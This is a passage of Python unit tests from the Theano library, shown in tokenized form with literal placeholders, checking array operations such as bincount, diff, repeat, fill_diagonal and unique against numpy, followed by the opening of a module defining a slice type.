function ( [ x ] , BinCountOp ( ) ( x , weights = None ) ) <EOL> f2 = theano . function ( [ x , w ] , BinCountOp ( ) ( x , weights = w ) ) <EOL> assert ( np . bincount ( a ) == f1 ( a ) ) . all ( ) <EOL> assert np . allclose ( np . 
bincount ( a , weights = weights ) , <EOL> f2 ( a , weights ) ) <EOL> if not numpy_16 : <EOL> continue <EOL> f3 = theano . function ( [ x ] , BinCountOp ( minlength = <NUM_LIT> ) ( x , weights = None ) ) <EOL> f4 = theano . function ( [ x ] , BinCountOp ( minlength = <NUM_LIT:5> ) ( x , weights = None ) ) <EOL> assert ( np . bincount ( a , minlength = <NUM_LIT> ) == f3 ( a ) ) . all ( ) <EOL> assert ( np . bincount ( a , minlength = <NUM_LIT:5> ) == f4 ( a ) ) . all ( ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_infer_shape ( self ) : <EOL> for dtype in tensor . discrete_dtypes : <EOL> int_bitwidth = theano . configdefaults . python_int_bitwidth ( ) <EOL> if int_bitwidth == <NUM_LIT:64> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , ) <EOL> if int_bitwidth == <NUM_LIT:32> : <EOL> numpy_unsupported_dtypes = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = T . vector ( '<STR_LIT:x>' , dtype = dtype ) <EOL> if dtype in numpy_unsupported_dtypes : <EOL> self . assertRaises ( TypeError , BinCountOp ( ) , x ) <EOL> else : <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( ) ( x , None ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> weights = np . random . random ( ( <NUM_LIT> , ) ) . astype ( config . floatX ) <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( ) ( x , weights = weights ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> if not numpy_16 : <EOL> continue <EOL> self . _compile_and_check ( <EOL> [ x ] , <EOL> [ BinCountOp ( minlength = <NUM_LIT> ) ( x , weights = weights ) ] , <EOL> [ np . random . random_integers ( <EOL> <NUM_LIT:50> , size = ( <NUM_LIT> , ) ) . astype ( dtype ) ] , <EOL> self . op_class ) <EOL> self . 
# NOTE(review): tail of a BinCountOp shape-inference test whose `def` line
# lies before this chunk; reproduced unchanged.
_compile_and_check(
    [x],
    [BinCountOp(minlength=<NUM_LIT:5>)(x, weights=weights)],
    [np.random.random_integers(
        <NUM_LIT:50>, size=(<NUM_LIT>,)).astype(dtype)],
    self.op_class)


class TestDiffOp(utt.InferShapeTester):
    """Tests for DiffOp/diff() against numpy.diff."""

    # Highest difference order `n` exercised by the loops below.
    nb = <NUM_LIT:10>

    def setUp(self):
        super(TestDiffOp, self).setUp()
        self.op_class = DiffOp
        self.op = DiffOp()

    def test_diffOp(self):
        # diff() must match numpy.diff for every axis and every order 0..nb-1.
        x = T.matrix('<STR_LIT:x>')
        a = np.random.random((<NUM_LIT:30>, <NUM_LIT:50>)).astype(config.floatX)

        f = theano.function([x], diff(x))
        assert np.allclose(np.diff(a), f(a))

        for axis in range(len(a.shape)):
            for k in range(TestDiffOp.nb):
                g = theano.function([x], diff(x, n=k, axis=axis))
                assert np.allclose(np.diff(a, n=k, axis=axis), g(a))

    def test_infer_shape(self):
        # Shape inference for the default op and all (n, axis) combinations.
        x = T.matrix('<STR_LIT:x>')
        a = np.random.random((<NUM_LIT:30>, <NUM_LIT:50>)).astype(config.floatX)

        self._compile_and_check([x],
                                [self.op(x)],
                                [a],
                                self.op_class)

        for axis in range(len(a.shape)):
            for k in range(TestDiffOp.nb):
                self._compile_and_check([x],
                                        [diff(x, n=k, axis=axis)],
                                        [a],
                                        self.op_class)

    def test_grad(self):
        # Gradient must both compile and pass numeric verification for
        # every order up to nb-1.
        x = T.vector('<STR_LIT:x>')
        a = np.random.random(<NUM_LIT:50>).astype(config.floatX)

        theano.function([x], T.grad(T.sum(diff(x)), x))
        utt.verify_grad(self.op, [a])

        for k in range(TestDiffOp.nb):
            theano.function([x], T.grad(T.sum(diff(x, n=k)), x))
            utt.verify_grad(DiffOp(n=k), [a], eps=<NUM_LIT>)


class SqueezeTester(utt.InferShapeTester):
    """Tests for squeeze(): values, inferred shapes, gradient, var method."""

    # Input shapes and their matching broadcastable patterns (True marks a
    # size-1, squeezable dimension); the two lists are zipped entrywise.
    shape_list = [(<NUM_LIT:1>, <NUM_LIT:3>),
                  (<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>),
                  (<NUM_LIT:1>, <NUM_LIT:5>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:6>)]
    broadcast_list = [[True, False],
                      [True, False, False],
                      [True, False, True, True, False]]

    def setUp(self):
        super(SqueezeTester, self).setUp()
        self.op = squeeze

    def test_op(self):
        for shape, broadcast in zip(self.shape_list, self.broadcast_list):
            data = numpy.random.random(size=shape).astype(theano.config.floatX)
            variable = tensor.TensorType(theano.config.floatX, broadcast)()

            f = theano.function([variable], self.op(variable))

            expected = numpy.squeeze(data)
            tested = f(data)

            assert tested.shape == expected.shape
            assert numpy.allclose(tested, expected)

    def test_infer_shape(self):
        for shape, broadcast in zip(self.shape_list, self.broadcast_list):
            data = numpy.random.random(size=shape).astype(theano.config.floatX)
            variable = tensor.TensorType(theano.config.floatX, broadcast)()

            # squeeze lowers to a DimShuffle node, hence the op class checked.
            self._compile_and_check([variable],
                                    [self.op(variable)],
                                    [data],
                                    tensor.DimShuffle,
                                    warn=False)

    def test_grad(self):
        for shape, broadcast in zip(self.shape_list, self.broadcast_list):
            data = numpy.random.random(size=shape).astype(theano.config.floatX)

            utt.verify_grad(self.op, [data])

    def test_var_interface(self):
        # Same as test_op, but through the TensorVariable.squeeze() method.
        for shape, broadcast in zip(self.shape_list, self.broadcast_list):
            data = numpy.random.random(size=shape).astype(theano.config.floatX)
            variable = tensor.TensorType(theano.config.floatX, broadcast)()

            f = theano.function([variable], variable.squeeze())

            expected = numpy.squeeze(data)
            tested = f(data)

            assert tested.shape == expected.shape
            assert numpy.allclose(tested, expected)


class CompressTester(utt.InferShapeTester):
    """Tests for compress() against numpy.compress."""

    # Per-case (axis, condition, input shape) triples, zipped in test_op.
    # Includes an empty condition and an all-False condition as edge cases.
    axis_list = [None,
                 -<NUM_LIT:1>,
                 <NUM_LIT:0>,
                 <NUM_LIT:0>,
                 <NUM_LIT:0>,
                 <NUM_LIT:1>]
    cond_list = [[<NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:1>],
                 [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:0>],
                 [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:0>],
                 [],
                 [<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>],
                 [<NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:0>]]
    shape_list = [(<NUM_LIT:2>, <NUM_LIT:3>),
                  (<NUM_LIT:4>, <NUM_LIT:3>),
                  (<NUM_LIT:4>, <NUM_LIT:3>),
                  (<NUM_LIT:4>, <NUM_LIT:3>),
                  (<NUM_LIT:4>, <NUM_LIT:3>),
                  (<NUM_LIT:3>, <NUM_LIT:5>)]

    def setUp(self):
        super(CompressTester, self).setUp()
        self.op = compress

    def test_op(self):
        for axis, cond, shape in zip(self.axis_list, self.cond_list,
                                     self.shape_list):
            cond_var = theano.tensor.ivector()
            data = numpy.random.random(size=shape).astype(theano.config.floatX)
            data_var = theano.tensor.matrix()

            f = theano.function([cond_var, data_var],
                                self.op(cond_var, data_var, axis=axis))

            expected = numpy.compress(cond, data, axis=axis)
            tested = f(cond, data)

            assert tested.shape == expected.shape
            assert numpy.allclose(tested, expected)


class TestRepeatOp(utt.InferShapeTester):
    """Tests for RepeatOp / repeat() against numpy.repeat."""

    def _possible_axis(self, ndim):
        # All axes to test, including negative ones.
        # NOTE(review): `-i for i in range(ndim)` starts at -0 (duplicate of
        # 0) and never reaches -ndim; presumably intended, but worth
        # confirming against the op's accepted axis range.
        return [None] + list(range(ndim)) + [-i for i in range(ndim)]

    def setUp(self):
        super(TestRepeatOp, self).setUp()
        self.op_class = RepeatOp
        self.op = RepeatOp()
        # dtypes that numpy cannot accept as repeat counts on this platform.
        # NOTE(review): left unset when the pointer bitwidth is neither 64
        # nor 32, which would make later attribute reads raise — confirm
        # these two branches are exhaustive on supported platforms.
        ptr_bitwidth = theano.configdefaults.local_bitwidth()
        if ptr_bitwidth == <NUM_LIT:64>:
            self.numpy_unsupported_dtypes = ('<STR_LIT>',)
        if ptr_bitwidth == <NUM_LIT:32>:
            self.numpy_unsupported_dtypes = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_repeatOp(self):
        for ndim in range(<NUM_LIT:3>):
            x = T.TensorType(config.floatX, [False] * ndim)()
            a = np.random.random((<NUM_LIT:10>,) * ndim).astype(config.floatX)

            for axis in self._possible_axis(ndim):
                for dtype in tensor.discrete_dtypes:
                    r_var = T.scalar(dtype=dtype)
                    r = numpy.asarray(<NUM_LIT:3>, dtype=dtype)
                    if (dtype == '<STR_LIT>' or
                            (dtype in self.numpy_unsupported_dtypes and
                             r_var.ndim == <NUM_LIT:1>)):
                        # Unsupported count dtypes must be rejected up front.
                        self.assertRaises(TypeError,
                                          repeat, x, r_var, axis=axis)
                    else:
                        # Scalar repeat count.
                        f = theano.function([x, r_var],
                                            repeat(x, r_var, axis=axis))
                        assert np.allclose(np.repeat(a, r, axis=axis),
                                           f(a, r))

                        # Vector repeat counts (one count per element/slice).
                        r_var = T.vector(dtype=dtype)
                        if axis is None:
                            r = np.random.random_integers(
                                <NUM_LIT:5>, size=a.size).astype(dtype)
                        else:
                            r = np.random.random_integers(
                                <NUM_LIT:5>, size=(<NUM_LIT:10>,)).astype(dtype)

                        if dtype in self.numpy_unsupported_dtypes and r_var.ndim == <NUM_LIT:1>:
                            self.assertRaises(TypeError,
                                              repeat, x, r_var, axis=axis)
                        else:
                            f = theano.function([x, r_var],
                                                repeat(x, r_var, axis=axis))
                            assert np.allclose(np.repeat(a, r, axis=axis),
                                               f(a, r))

                        # Constant list count: should be optimized so no
                        # RepeatOp node remains in the compiled graph.
                        r = np.random.random_integers(<NUM_LIT:10>, size=()).astype(dtype) + <NUM_LIT:2>
                        f = theano.function([x],
                                            repeat(x, [r], axis=axis))
                        assert np.allclose(np.repeat(a, r, axis=axis),
                                           f(a))
                        assert not np.any([isinstance(n.op, RepeatOp)
                                           for n in f.maker.fgraph.toposort()])

                        # Broadcastable length-1 vector count: same
                        # optimization applies.
                        r_var = theano.tensor.TensorType(broadcastable=(True,),
                                                         dtype=dtype)()
                        r = np.random.random_integers(<NUM_LIT:5>, size=(<NUM_LIT:1>,)).astype(dtype)
                        f = theano.function([x, r_var],
                                            repeat(x, r_var, axis=axis))
                        assert np.allclose(np.repeat(a, r[<NUM_LIT:0>], axis=axis),
                                           f(a, r))
                        assert not np.any([isinstance(n.op, RepeatOp)
                                           for n in f.maker.fgraph.toposort()])

    @attr('<STR_LIT>')
    def test_infer_shape(self):
        for ndim in range(<NUM_LIT:4>):
            x = T.TensorType(config.floatX, [False] * ndim)()
            shp = (numpy.arange(ndim) + <NUM_LIT:1>) * <NUM_LIT:5>
            a = np.random.random(shp).astype(config.floatX)
            for axis in self._possible_axis(ndim):
                for dtype in tensor.discrete_dtypes:
                    r_var = T.scalar(dtype=dtype)
                    r = numpy.asarray(<NUM_LIT:3>, dtype=dtype)
                    if dtype in self.numpy_unsupported_dtypes:
                        r_var = T.vector(dtype=dtype)
                        self.assertRaises(TypeError, repeat, x, r_var)
                    else:
                        self._compile_and_check(
                            [x, r_var],
                            [RepeatOp(axis=axis)(x, r_var)],
                            [a, r],
                            self.op_class)

                        r_var = T.vector(dtype=dtype)
                        if axis is None:
                            r = np.random.random_integers(
                                <NUM_LIT:5>, size=a.size).astype(dtype)
                        elif a.size > <NUM_LIT:0>:
                            r = np.random.random_integers(
                                <NUM_LIT:5>, size=a.shape[axis]).astype(dtype)
                        else:
                            r = np.random.random_integers(
                                <NUM_LIT:5>, size=(<NUM_LIT:10>,)).astype(dtype)

                        self._compile_and_check(
                            [x, r_var],
                            [RepeatOp(axis=axis)(x, r_var)],
                            [a, r],
                            self.op_class)

    def test_grad(self):
        for ndim in range(<NUM_LIT:3>):
            a = np.random.random((<NUM_LIT:10>,) * ndim).astype(config.floatX)

            for axis in self._possible_axis(ndim):
                utt.verify_grad(lambda x: RepeatOp(axis=axis)(x, <NUM_LIT:3>), [a])

    def test_broadcastable(self):
        # Repeating along an axis makes it non-broadcastable unless the
        # repeat count is 1; other axes keep their pattern.
        x = T.TensorType(config.floatX, [False, True, False])()
        r = RepeatOp(axis=<NUM_LIT:1>)(x, <NUM_LIT:2>)
        self.assertEqual(r.broadcastable, (False, False, False))
        r = RepeatOp(axis=<NUM_LIT:1>)(x, <NUM_LIT:1>)
        self.assertEqual(r.broadcastable, (False, True, False))
        r = RepeatOp(axis=<NUM_LIT:0>)(x, <NUM_LIT:2>)
        self.assertEqual(r.broadcastable, (False, True, False))


class TestBartlett(utt.InferShapeTester):
    """Tests for bartlett() against numpy.bartlett."""

    def setUp(self):
        super(TestBartlett, self).setUp()
        self.op_class = Bartlett
        self.op = bartlett

    def test_perform(self):
        x = tensor.lscalar()
        f = function([x], self.op(x))
        M = numpy.random.random_integers(<NUM_LIT:3>, <NUM_LIT:50>, size=())
        assert numpy.allclose(f(M), numpy.bartlett(M))
        # Degenerate window lengths must also agree with numpy.
        assert numpy.allclose(f(<NUM_LIT:0>), numpy.bartlett(<NUM_LIT:0>))
        assert numpy.allclose(f(-<NUM_LIT:1>), numpy.bartlett(-<NUM_LIT:1>))
        b = numpy.array([<NUM_LIT>], dtype='<STR_LIT>')
        assert numpy.allclose(f(b[<NUM_LIT:0>]), numpy.bartlett(b[<NUM_LIT:0>]))

    def test_infer_shape(self):
        x = tensor.lscalar()

        self._compile_and_check([x], [self.op(x)],
                                [numpy.random.random_integers(<NUM_LIT:3>, <NUM_LIT:50>, size=())],
                                self.op_class)
        self._compile_and_check([x], [self.op(x)], [<NUM_LIT:0>], self.op_class)
        self._compile_and_check([x], [self.op(x)], [<NUM_LIT:1>], self.op_class)


class TestFillDiagonal(utt.InferShapeTester):
    """Tests for fill_diagonal on matrices and cubic 3-d tensors."""

    rng = numpy.random.RandomState(<NUM_LIT>)

    def setUp(self):
        super(TestFillDiagonal, self).setUp()
        self.op_class = FillDiagonal
        self.op = fill_diagonal

    def test_perform(self):
        x = tensor.matrix()
        y = tensor.scalar()
        f = function([x, y], fill_diagonal(x, y))
        for shp in [(<NUM_LIT:8>, <NUM_LIT:8>), (<NUM_LIT:5>, <NUM_LIT:8>), (<NUM_LIT:8>, <NUM_LIT:5>)]:
            a = numpy.random.rand(*shp).astype(config.floatX)
            val = numpy.cast[config.floatX](numpy.random.rand())
            out = f(a, val)
            # The whole diagonal holds `val` and nothing else was written.
            assert numpy.allclose(numpy.diag(out), val)
            assert (out == val).sum() == min(a.shape)

        # 3-d case: only the [i, i, i] entries are filled.
        a = numpy.random.rand(<NUM_LIT:3>, <NUM_LIT:3>, <NUM_LIT:3>).astype(config.floatX)
        x = tensor.tensor3()
        y = tensor.scalar()
        f = function([x, y], fill_diagonal(x, y))
        val = numpy.cast[config.floatX](numpy.random.rand() + <NUM_LIT:10>)
        out = f(a, val)

        assert out[<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>] == val
        assert out[<NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:1>] == val
        assert out[<NUM_LIT:2>, <NUM_LIT:2>, <NUM_LIT:2>] == val
        assert (out == val).sum() == min(a.shape)

    @attr('<STR_LIT>')
    def test_gradient(self):
        utt.verify_grad(fill_diagonal, [numpy.random.rand(<NUM_LIT:5>, <NUM_LIT:8>),
                                        numpy.random.rand()],
                        n_tests=<NUM_LIT:1>, rng=TestFillDiagonal.rng)
        utt.verify_grad(fill_diagonal, [numpy.random.rand(<NUM_LIT:8>, <NUM_LIT:5>),
                                        numpy.random.rand()],
                        n_tests=<NUM_LIT:1>, rng=TestFillDiagonal.rng)

    def test_infer_shape(self):
        z = tensor.dtensor3()
        x = tensor.dmatrix()
        y = tensor.dscalar()
        self._compile_and_check([x, y], [self.op(x, y)],
                                [numpy.random.rand(<NUM_LIT:8>, <NUM_LIT:5>),
                                 numpy.random.rand()],
                                self.op_class)
        self._compile_and_check([z, y], [self.op(z, y)],
                                [numpy.random.rand(<NUM_LIT:8>, <NUM_LIT:8>, <NUM_LIT:8>),
                                 numpy.random.rand()],
                                self.op_class,
                                warn=False)


class TestFillDiagonalOffset(utt.InferShapeTester):
    """Tests for fill_diagonal_offset over a range of positive and
    negative offsets."""

    rng = numpy.random.RandomState(<NUM_LIT>)

    def setUp(self):
        super(TestFillDiagonalOffset, self).setUp()
        self.op_class = FillDiagonalOffset
        self.op = fill_diagonal_offset

    def test_perform(self):
        x = tensor.matrix()
        y = tensor.scalar()
        z = tensor.iscalar()

        f = function([x, y, z], fill_diagonal_offset(x, y, z))
        for test_offset in (-<NUM_LIT:5>, -<NUM_LIT:4>, -<NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:4>, <NUM_LIT:5>):
            for shp in [(<NUM_LIT:8>, <NUM_LIT:8>), (<NUM_LIT:5>, <NUM_LIT:8>), (<NUM_LIT:8>, <NUM_LIT:5>), (<NUM_LIT:5>, <NUM_LIT:5>)]:
                a = numpy.random.rand(*shp).astype(config.floatX)
                val = numpy.cast[config.floatX](numpy.random.rand())
                out = f(a, val, test_offset)
                # The selected diagonal holds val ...
                assert numpy.allclose(numpy.diag(out, test_offset), val)
                # ... and exactly that diagonal's length of cells was written.
                if test_offset >= <NUM_LIT:0>:
                    assert (out == val).sum() == min(min(a.shape),
                                                     a.shape[<NUM_LIT:1>] - test_offset)
                else:
                    assert (out == val).sum() == min(min(a.shape),
                                                     a.shape[<NUM_LIT:0>] + test_offset)

    def test_gradient(self):
        for test_offset in (-<NUM_LIT:5>, -<NUM_LIT:4>, -<NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:4>, <NUM_LIT:5>):
            # Bind the current offset so verify_grad only varies (a, val).
            def fill_diagonal_with_fix_offset(a, val):
                return fill_diagonal_offset(a, val, test_offset)

            utt.verify_grad(fill_diagonal_with_fix_offset,
                            [numpy.random.rand(<NUM_LIT:5>, <NUM_LIT:8>), numpy.random.rand()],
                            n_tests=<NUM_LIT:1>, rng=TestFillDiagonalOffset.rng)
            utt.verify_grad(fill_diagonal_with_fix_offset,
                            [numpy.random.rand(<NUM_LIT:8>, <NUM_LIT:5>), numpy.random.rand()],
                            n_tests=<NUM_LIT:1>, rng=TestFillDiagonalOffset.rng)
            utt.verify_grad(fill_diagonal_with_fix_offset,
                            [numpy.random.rand(<NUM_LIT:5>, <NUM_LIT:5>), numpy.random.rand()],
                            n_tests=<NUM_LIT:1>, rng=TestFillDiagonalOffset.rng)

    def test_infer_shape(self):
        x = tensor.dmatrix()
        y = tensor.dscalar()
        z = tensor.iscalar()
        for test_offset in (-<NUM_LIT:5>, -<NUM_LIT:4>, -<NUM_LIT:1>, <NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:4>, <NUM_LIT:5>):
            self._compile_and_check([x, y, z], [self.op(x, y, z)],
                                    [numpy.random.rand(<NUM_LIT:8>, <NUM_LIT:5>),
                                     numpy.random.rand(),
                                     test_offset],
                                    self.op_class)
            self._compile_and_check([x, y, z], [self.op(x, y, z)],
                                    [numpy.random.rand(<NUM_LIT:5>, <NUM_LIT:8>),
                                     numpy.random.rand(),
                                     test_offset],
                                    self.op_class)


def test_to_one_hot():
    # to_one_hot() builds one-hot rows: floatX by default, custom dtype on
    # request.
    v = theano.tensor.ivector()
    o = to_one_hot(v, <NUM_LIT:10>)
    f = theano.function([v], o)
    out = f([<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:5>, <NUM_LIT:6>])
    assert out.dtype == theano.config.floatX
    assert numpy.allclose(
        out,
        [[<NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>]])

    # Same input, explicit output dtype.
    v = theano.tensor.ivector()
    o = to_one_hot(v, <NUM_LIT:10>, dtype="<STR_LIT>")
    f = theano.function([v], o)
    out = f([<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:5>, <NUM_LIT:6>])
    assert out.dtype == "<STR_LIT>"
    assert numpy.allclose(
        out,
        [[<NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>],
         [<NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:1.>, <NUM_LIT:0.>, <NUM_LIT:0.>, <NUM_LIT:0.>]])


class test_Unique(utt.InferShapeTester):
    """Tests for the Unique op against numpy.unique."""

    def setUp(self):
        super(test_Unique, self).setUp()
        self.op_class = Unique
        # All flag combinations; the return_counts variants require
        # numpy >= 1.9, mirroring the expected-output lists below.
        self.ops = [Unique(),
                    Unique(True),
                    Unique(False, True),
                    Unique(True, True)]
        if bool(numpy_ver >= [<NUM_LIT:1>, <NUM_LIT:9>]):
            self.ops.extend([
                Unique(False, False, True),
                Unique(True, False, True),
                Unique(False, True, True),
                Unique(True, True, True)])

    def test_basic_vector(self):
        """Unique op outputs match numpy.unique on a 1-d input."""
        x = theano.tensor.vector()
        inp = np.asarray([<NUM_LIT:2>, <NUM_LIT:1>, <NUM_LIT:3>, <NUM_LIT:2>], dtype=config.floatX)
        list_outs_expected = [[np.unique(inp)],
                              np.unique(inp, True),
                              np.unique(inp, False, True),
                              np.unique(inp, True, True)]
        if bool(numpy_ver >= [<NUM_LIT:1>, <NUM_LIT:9>]):
            list_outs_expected.extend([
                np.unique(inp, False, False, True),
                np.unique(inp, True, False, True),
                np.unique(inp, False, True, True),
                np.unique(inp, True, True, True)])
        for op, outs_expected in zip(self.ops, list_outs_expected):
            f = theano.function(inputs=[x], outputs=op(x, return_list=True))
            outs = f(inp)
            for out, out_exp in zip(outs, outs_expected):
                utt.assert_allclose(out, out_exp)

    def test_basic_matrix(self):
        """Unique op outputs match numpy.unique on a 2-d input."""
        x = theano.tensor.matrix()
        inp = np.asarray([[<NUM_LIT:2>, <NUM_LIT:1>], [<NUM_LIT:3>, <NUM_LIT:2>], [<NUM_LIT:2>, <NUM_LIT:3>]], dtype=config.floatX)
        list_outs_expected = [[np.unique(inp)],
                              np.unique(inp, True),
                              np.unique(inp, False, True),
                              np.unique(inp, True, True)]
        if bool(numpy_ver >= [<NUM_LIT:1>, <NUM_LIT:9>]):
            list_outs_expected.extend([
                np.unique(inp, False, False, True),
                np.unique(inp, True, False, True),
                np.unique(inp, False, True, True),
                np.unique(inp, True, True, True)])
        for op, outs_expected in zip(self.ops, list_outs_expected):
            f = theano.function(inputs=[x], outputs=op(x, return_list=True))
            outs = f(inp)
            for out, out_exp in zip(outs, outs_expected):
                utt.assert_allclose(out, out_exp)

    def test_infer_shape_vector(self):
        """Shape inference for the inverse-index output on a vector."""
        x = theano.tensor.vector()
        for op in self.ops:
            if not op.return_inverse:
                continue
            # The inverse-index output sits at position 2 when the index
            # output is also requested, otherwise at position 1.
            if op.return_index:
                f = op(x)[<NUM_LIT:2>]
            else:
                f = op(x)[<NUM_LIT:1>]
            self._compile_and_check([x],
                                    [f],
                                    [np.asarray(np.array([<NUM_LIT:2>, <NUM_LIT:1>, <NUM_LIT:3>, <NUM_LIT:2>]),
                                                dtype=config.floatX)],
                                    self.op_class)

    def test_infer_shape_matrix(self):
        """Shape inference for the inverse-index output on a matrix."""
        x = theano.tensor.matrix()
        for op in self.ops:
            if not op.return_inverse:
                continue
            if op.return_index:
                f = op(x)[<NUM_LIT:2>]
            else:
                f = op(x)[<NUM_LIT:1>]
            self._compile_and_check([x],
                                    [f],
                                    [np.asarray(np.array([[<NUM_LIT:2>, <NUM_LIT:1>], [<NUM_LIT:3>, <NUM_LIT:2>], [<NUM_LIT:2>, <NUM_LIT:3>]]),
                                                dtype=config.floatX)],
                                    self.op_class)
<s> import numpy <EOL> import theano <EOL> from theano . gof import Apply , Constant , Generic , Op , Type , hashtype <EOL> from theano . gradient import DisconnectedType <EOL> def as_int_none_variable ( x ) : <EOL> if x is None : <EOL> return NoneConst <EOL> elif NoneConst . equals ( x ) : <EOL> return x <EOL> x = theano . tensor . as_tensor_variable ( x , ndim = <NUM_LIT:0> ) <EOL> if x . type . dtype [ : <NUM_LIT:3> ] not in ( '<STR_LIT:int>' , '<STR_LIT>' ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return x <EOL> class MakeSlice ( Op ) : <EOL> __props__ = ( ) <EOL> def make_node ( self , slc , stop = None , step = None ) : <EOL> if isinstance ( slc , slice ) : <EOL> assert stop is None <EOL> assert step is None <EOL> inp = [ slc . start , slc . stop , slc . step ] <EOL> else : <EOL> inp = [ slc , stop , step ] <EOL> return Apply ( self , <EOL> list ( map ( as_int_none_variable , inp ) ) , <EOL> [ slicetype ( ) ] ) <EOL> def perform ( self , node , inp , out_ ) : <EOL> out , = out_ <EOL> out [ <NUM_LIT:0> ] = slice ( * inp ) <EOL> def grad ( self , inputs , grads ) : <EOL> return [ DisconnectedType ( ) ( ) for i in inputs ] <EOL> make_slice = MakeSlice ( ) <EOL> class SliceType ( Type ) : <EOL> def filter ( self , x , strict = False , allow_downcast = None ) : <EOL> if isinstance ( x , slice ) : <EOL> return x <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hashtype ( self ) <EOL> @ staticmethod <EOL> def may_share_memory ( a , b ) : <EOL> return isinstance ( a , slice ) and a is b <EOL> slicetype = SliceType ( ) <EOL> class SliceConstant ( Constant ) : <EOL> def __init__ ( self , type , data , name = None ) : <EOL> assert isinstance ( data , slice ) <EOL> if isinstance ( data . start , numpy . ndarray ) : <EOL> assert data . start . 
